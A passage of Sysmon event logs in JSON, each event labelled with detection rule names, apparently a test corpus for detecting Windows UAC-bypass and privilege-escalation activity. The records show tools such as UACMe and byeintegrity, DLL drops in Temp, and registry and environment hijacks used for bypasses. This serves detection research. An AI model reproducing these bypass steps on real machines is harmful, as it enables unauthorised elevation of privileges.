","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-1EB6-5F76-0000-00101DF51D00","ParentProcessId":8072,"ProcessGuid":"747F3D96-2156-5F76-0000-0010DBE82500","ProcessId":4696,"Product":"SearchIndexer","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-10-01 18:35:02.413"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":410485,"Execution_attributes":{"ProcessID":3308,"ThreadID":4656},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-10-01T18:35:02.415351Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"CommandLine":"Program","Company":"","CurrentDirectory":"C:\\Users\\Public\\POC\\bin\\Debug\\","Description":"SearchIndexer","FileVersion":"1.0.0.0","Hashes":"SHA1=3DA62D5328C591481C9C262BC3A77E5FF32EDBB6,MD5=15661E68D8031891DF6E0E70B547AEBB,SHA256=BEF67963D92D027E39CC5FC927805A4EBFE58C2121BA9396356EF0CE257D0C92,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744","Image":"C:\\Users\\Public\\POC\\bin\\Debug\\POC.exe","IntegrityLevel":"AppContainer","LogonGuid":"747F3D96-18F5-5F76-0000-002073A80500","LogonId":"0x5a873","OriginalFileName":"POC.exe","ParentCommandLine":"POC.exe","ParentImage":"C:\\Users\\Public\\POC\\bin\\Debug\\POC.exe","ParentProcessGuid":"747F3D96-2156-5F76-0000-0010DBE82500","ParentProcessId":4696,"ProcessGuid":"747F3D96-2156-5F76-0000-00100EEC2500","ProcessId":5448,"Product":"SearchIndexer","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-10-01 18:35:02.605"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":410486,"Execution_attributes":{"ProcessID":3308,"ThreadID":4656},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-10-01T18:35:02.606952Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-10-01 18:35:02.768","Image":"C:\\Windows\\System32\\RuntimeBroker.exe","ProcessGuid":"747F3D96-1903-5F76-0000-0010B85E0900","ProcessId":6932,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Microsoft\\abc.txt","UtcTime":"2020-10-01 18:35:02.768"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":410487,"Execution_attributes":{"ProcessID":3308,"ThreadID":4656},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-10-01T18:35:02.775302Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Svchost Process","Windows Processes Suspicious Parent Directory"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Host Process for Windows Services","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69","Image":"C:\\Windows\\System32\\svchost.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-5461-5EBA-0000-0020E7030000","LogonId":"0x3e7","OriginalFileName":"svchost.exe","ParentCommandLine":"?","ParentImage":"?","ParentProcessGuid":"00000000-0000-0000-0000-000000000000","ParentProcessId":580,"ProcessGuid":"747F3D96-DE32-5EB9-0000-00103FC14300","ProcessId":5252,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2020-05-11 23:22:26.451"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":142033,"Execution_attributes":{"ProcessID":2896,"ThreadID":3548},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-05-11T23:22:26.650196Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Users\\Public\\psexecprivesc.exe\" C:\\Windows\\System32\\mspaint.exe","Company":"?","CurrentDirectory":"C:\\Users\\Public\\","Description":"?","FileVersion":"?","Hashes":"SHA1=D7BADB1E51B7F5AB36D218854698215436C77D69,MD5=45C9D210322AC8F8AEC6D2AB003F82A9,SHA256=F60E25BFB2BF7CB3E3CBD47F6A6D12941BD0BC0CF5B5626415607FDF0ACD2132,IMPHASH=6BC87C5562804B37769BD928D309AFDA","Image":"C:\\Users\\Public\\psexecprivesc.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-FBCC-5FD0-0000-0020CB857400","LogonId":"0x7485cb","OriginalFileName":"?","ParentCommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" ","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-FBFF-5FD0-0000-0010BEC87C00","ParentProcessId":14512,"ProcessGuid":"747F3D96-00D2-5FD1-0000-0010FA4C5301","ProcessId":13004,"Product":"?","RuleName":"","TerminalSessionId":3,"User":"MSEDGEWIN10\\user02","UtcTime":"2020-12-09 16:52:34.559"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":549480,"Execution_attributes":{"ProcessID":3572,"ThreadID":5040},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-12-09T16:52:34.562791Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["PsExec Service Start"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\PSEXESVC.exe","Company":"Sysinternals","CurrentDirectory":"C:\\Windows\\system32\\","Description":"PsExec Service","FileVersion":"2.2","Hashes":"SHA1=A17C21B909C56D93D978014E63FB06926EAEA8E7,MD5=75B55BB34DAC9D02740B9AD6B6820360,SHA256=141B2190F51397DBD0DFDE0E3904B264C91B6F81FEBC823FF0C33DA980B69944,IMPHASH=67012475995FB9027F4511245B57DDEA","Image":"C:\\Windows\\PSEXESVC.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-76FA-5FD1-0000-0020E7030000","LogonId":"0x3e7","OriginalFileName":"psexesvc.exe","ParentCommandLine":"?","ParentImage":"?","ParentProcessGuid":"00000000-0000-0000-0000-000000000000","ParentProcessId":632,"ProcessGuid":"747F3D96-00D9-5FD1-0000-001021855301","ProcessId":16344,"Product":"Sysinternals PsExec","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2020-12-09 16:52:41.853"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":549482,"Execution_attributes":{"ProcessID":3572,"ThreadID":5040},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-12-09T16:52:41.861437Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Tool UACMe"],"event":{"Event":{"EventData":{"CommandLine":"Akagi.exe 58 c:\\Windows\\System32\\cmd.exe","Company":"Hazardous Environments","CurrentDirectory":"C:\\Users\\IEUser\\Tools\\PrivEsc\\","Description":"UACMe main module","FileVersion":"3.2.5.2005","Hashes":"SHA1=874C9878FF9C1A9AC60658E83649370EA4E61829,MD5=FD17237A6B50C51CBEB45A28E0284063,SHA256=B4E9DCFC87014B2B70CC9E3CD4E34AE4425E40C81A2ED008C7D335E3F96ADD19,IMPHASH=FF31A97D8C8EBEBDA4D7B3DF95E756F1","Image":"C:\\Users\\IEUser\\Tools\\PrivEsc\\Akagi.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-B086-5EBA-0000-0020EF9E0800","LogonId":"0x89eef","OriginalFileName":"Akagi.exe","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-B093-5EBA-0000-0010E7350E00","ParentProcessId":6708,"ProcessGuid":"747F3D96-BB89-5EBA-0000-001057413600","ProcessId":1036,"Product":"UACMe","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-05-12 15:06:49.006"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":143173,"Execution_attributes":{"ProcessID":2856,"ThreadID":3608},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-05-12T15:06:49.019031Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\DNeruK","EventType":"SetValue","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"747F3D96-BB89-5EBA-0000-001057413600","ProcessId":1036,"RuleName":"PrivEsc - Rogue Windir - UAC bypass prep","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Environment\\windir","UtcTime":"2020-05-12 15:06:49.118"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":143174,"Execution_attributes":{"ProcessID":2856,"ThreadID":3608},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-05-12T15:06:49.183867Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-05-12 15:06:49.134","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"747F3D96-BB89-5EBA-0000-001057413600","ProcessId":1036,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\DNeruK\\system32\\Clipup.exe","UtcTime":"2020-05-12 15:06:49.134"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":143175,"Execution_attributes":{"ProcessID":2856,"ThreadID":3608},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-05-12T15:06:49.184059Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-05-11 16:54:02.305","Image":"c:\\python27\\python.exe","ProcessGuid":"365ABB72-FE2A-5CD6-0000-00107E091700","ProcessId":2028,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\CRYPTBASE.dll","UtcTime":"2019-05-11 16:54:02.305"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":15987,"Execution_attributes":{"ProcessID":2008,"ThreadID":1992},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-05-11T16:54:02.305766Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-05-11 16:54:07.462","Image":"C:\\Windows\\System32\\makecab.exe","ProcessGuid":"365ABB72-FE2F-5CD6-0000-001019201700","ProcessId":2956,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\suspicious.cab","UtcTime":"2019-05-11 16:54:07.462"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":15989,"Execution_attributes":{"ProcessID":2008,"ThreadID":1992},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-05-11T16:54:07.524516Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"CommandLine":"byeintegrity5-uac.exe","Company":"?","CurrentDirectory":"C:\\Users\\Public\\tools\\privesc\\uac\\","Description":"?","FileVersion":"?","Hashes":"SHA1=DF21EC2A3D7EE2AE853C29CBD8AB774A78ED7BF4,MD5=8671D1F95CC31E33F61DEF8C99B42B64,SHA256=2D41A174EA0589F39AA267F829870131AE18CFF1B19648C118DC5A00AEAF078B,IMPHASH=EA12F696E9727F4454BA1EFA0CAFAD2D","Image":"C:\\Users\\Public\\tools\\privesc\\uac\\byeintegrity5-uac.exe","IntegrityLevel":"Medium","LogonGuid":"00247C92-3404-5FBE-0000-002044CA0600","LogonId":"0x6ca44","OriginalFileName":"?","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"00247C92-BB27-5FBF-0000-0010F69CFA0A","ParentProcessId":12228,"ProcessGuid":"00247C92-E803-5FBF-0000-0010D1B5B40C","ProcessId":11644,"Product":"?","RuleName":"","TerminalSessionId":1,"User":"LAPTOP-JU4M3I0E\\bouss","UtcTime":"2020-11-26 17:38:11.137"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":1,"EventRecordID":2362764,"Execution_attributes":{"ProcessID":5900,"ThreadID":6484},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-11-26T17:38:11.138458Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File","Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-11-26 17:38:11.146","Image":"C:\\Users\\Public\\tools\\privesc\\uac\\byeintegrity5-uac.exe","ProcessGuid":"00247C92-E803-5FBF-0000-0010D1B5B40C","ProcessId":11644,"RuleName":"","TargetFilename":"C:\\Users\\Public\\tools\\privesc\\uac\\system32\\npmproxy.dll","UtcTime":"2020-11-26 17:38:11.146"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2362765,"Execution_attributes":{"ProcessID":5900,"ThreadID":6484},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-11-26T17:38:11.147605Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer","Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"Details":"C:\\Users\\Public\\tools\\privesc\\uac","EventType":"SetValue","Image":"C:\\Users\\Public\\tools\\privesc\\uac\\byeintegrity5-uac.exe","ProcessGuid":"00247C92-E803-5FBF-0000-0010D1B5B40C","ProcessId":11644,"RuleName":"","TargetObject":"HKU\\S-1-5-21-1586556212-2165235939-1437495523-1001\\Environment\\systemroot","UtcTime":"2020-11-26 17:38:11.151"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":13,"EventRecordID":2362767,"Execution_attributes":{"ProcessID":5900,"ThreadID":6484},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-11-26T17:38:11.152295Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-08-03 12:06:53.846","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"747F3D96-78DD-5D45-0000-0010B8A50301","ProcessId":5080,"RuleName":"PrivEsc - UAC Bypass UACME 23","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\dismcore.dll","UtcTime":"2019-08-03 12:06:53.846"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":5429,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-08-03T12:06:53.933988Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-08-04 09:33:57.716","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"747F3D96-A685-5D46-0000-00109B2AD703","ProcessId":3916,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\Fubuki.exe","UtcTime":"2019-08-04 09:33:57.716"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":5763,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-08-04T09:33:57.800853Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-08-03 15:08:06.372","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"747F3D96-A356-5D45-0000-001029AA9901","ProcessId":4480,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\pe386.dll","UtcTime":"2019-08-03 15:08:06.372"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":5527,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-08-03T15:08:06.419322Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Driver Load from Temp"],"event":{"Event":{"EventData":{"Company":"Hazardous Environments","Description":"UACMe proxy DLL","FileVersion":"3.1.9.1905","Hashes":"SHA1=60BFDEAE730B165AF65A82817CED76F7400C9CF0,MD5=CC591D9CA772C818093FED853BF64848,SHA256=EC793B0A45BDB2F15D210E545A893AA096D68FF537DD022C4B443BDE2A448491,IMPHASH=069E5461D2FBAD8D4C3909C4E0340847","Image":"C:\\Windows\\System32\\mmc.exe","ImageLoaded":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\pe386.dll","ProcessGuid":"747F3D96-A356-5D45-0000-001014F99901","ProcessId":4056,"Product":"UACMe","RuleName":"Execution - Image Loaded from suspicious path","Signature":"","SignatureStatus":"Unavailable","Signed":"false","UtcTime":"2019-08-03 15:08:07.340"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":7,"EventRecordID":5531,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":7,"TimeCreated_attributes":{"SystemTime":"2019-08-03T15:08:07.508962Z"},"Version":3}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["MMC Spawning Windows Shell"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-56A3-5D45-0000-0020B3D31800","LogonId":"0x18d3b3","ParentCommandLine":"\"C:\\Windows\\System32\\mmc.exe\" eventvwr.msc","ParentImage":"C:\\Windows\\System32\\mmc.exe","ParentProcessGuid":"747F3D96-A356-5D45-0000-001014F99901","ParentProcessId":4056,"ProcessGuid":"747F3D96-A357-5D45-0000-0010BD149A01","ProcessId":5396,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-08-03 15:08:07.355"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":5532,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-08-03T15:08:07.558917Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","EventType":"SetValue","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ProcessGuid":"365ABB72-88DC-5CD3-0000-00100DA51A00","ProcessId":2704,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000_CLASSES\\mscfile\\shell\\open\\command\\(Default)","UtcTime":"2019-05-09 01:59:28.669"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":11112,"Execution_attributes":{"ProcessID":1980,"ThreadID":1904},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-05-09T01:59:28.669022Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows PowerShell","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-863B-5CD3-0000-00204A390100","LogonId":"0x1394a","ParentCommandLine":"\"C:\\Windows\\system32\\eventvwr.exe\" 